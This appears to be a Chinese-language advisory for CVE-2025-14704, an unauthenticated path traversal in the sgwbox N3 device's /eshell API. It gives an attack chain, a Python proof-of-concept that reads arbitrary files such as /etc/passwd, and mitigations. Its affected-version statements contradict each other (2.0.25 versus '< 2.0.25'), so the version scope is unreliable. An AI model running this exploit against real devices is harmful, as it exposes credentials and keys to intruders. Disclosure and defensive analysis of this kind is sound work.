CVE-2025-14704 Shiguangwu sgwbox N3 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-14704

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Shiguangwu sgwbox N3 2.0.25

漏洞概述

CVE-2025-14704是光时光网络科技（Shiguangwu）sgwbox N3设备中存在的一个高危路径遍历漏洞。该漏洞存在于设备的/eshell API组件中，攻击者可以通过构造特殊的文件路径请求，未经授权地访问服务器文件系统上的任意文件。由于该漏洞无需认证即可利用，且影响设备的网络管理接口，因此具有较高的安全风险。攻击者可能利用此漏洞读取敏感配置文件、用户凭证、系统日志以及其他关键数据，进而可能实现对设备的进一步控制或横向移动攻击。值得注意的是，该漏洞的利用代码已被公开，厂商在收到安全通知后未作出任何回应。

技术细节

该路径遍历漏洞源于sgwbox N3设备的Web管理界面中/eshell API端点对用户输入的文件路径缺乏充分的验证和过滤。攻击者可以通过在URL请求中插入../等目录遍历序列，结合目标文件路径，实现对系统目录的越权访问。例如，使用类似/eshell/../../../../etc/passwd的请求可以读取系统的用户账户信息。漏洞的根本原因在于应用程序在处理文件路径时未正确进行路径规范化（path normalization），允许攻击者通过相对路径引用逃逸出预期的文件访问范围。由于API组件直接与底层文件系统交互，攻击者成功利用此漏洞后可以读取任意文件内容，包括配置文件、SSH密钥、数据库文件等敏感信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标设备为Shiguangwu sgwbox N3设备，发现其运行在2.0.25版本

STEP 2

步骤2

攻击者访问设备的Web管理界面，定位到/eshell API端点

STEP 3

步骤3

攻击者构造包含目录遍历序列（如../）的恶意请求，指定目标文件路径

STEP 4

步骤4

服务器未对路径进行安全验证，直接处理请求并返回目标文件内容

STEP 5

步骤5

攻击者获取敏感信息（如配置文件、用户凭证）后，可进一步实施横向移动或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14704 Path Traversal PoC
# Target: Shiguangwu sgwbox N3 2.0.25
# Vulnerability: /eshell API path traversal

def exploit(target_url, file_path):
    """
    Exploit path traversal in /eshell API endpoint
    """
    # Construct path traversal payload
    traversal = "../../.."
    payload = f"/eshell/{traversal}/{file_path}"
    
    full_url = target_url.rstrip('/') + payload
    
    print(f"[*] Target: {full_url}")
    print(f"[*] Attempting to read: {file_path}")
    
    try:
        response = requests.get(full_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! File content:")
            print(response.text)
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: python {sys.argv[0]} http://target.com /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_to_read = sys.argv[2]
    exploit(target, file_to_read)

影响范围

Shiguangwu sgwbox N3 < 2.0.25

防御指南

临时缓解措施

在官方修复发布前，建议采取以下临时措施：1）使用防火墙或WAF规则限制对/eshell API端点的访问，仅允许受信任的IP地址访问管理接口；2）启用详细的访问日志监控，及时发现异常的路径遍历请求；3）考虑使用反向代理隔离管理接口；4）如果暂时不需要eshell功能，可考虑禁用相关组件以减少攻击面。